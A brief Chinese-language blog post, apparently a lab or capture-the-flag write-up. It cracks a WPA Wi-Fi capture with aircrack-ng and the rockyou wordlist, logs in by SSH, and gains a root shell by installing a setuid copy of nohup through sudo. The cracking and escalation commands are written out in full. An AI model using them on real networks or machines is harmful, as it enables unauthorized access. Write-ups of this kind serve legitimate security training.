李乐意的博客

tags:
@ 01/01/0001

无线网密码破解

802.11无线网协议,SSID=‘dlink’。

image-20251021150820100

aircrack-ng -w /usr/share/wordlists/rockyou.txt WPA-01.cap

image-20251021150622006

密码p4ssword。

ssh登录

ssh dlink@192.168.30.153

提权

image-20251021151255120

sudo install -m =xs $(which nohup) .

./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"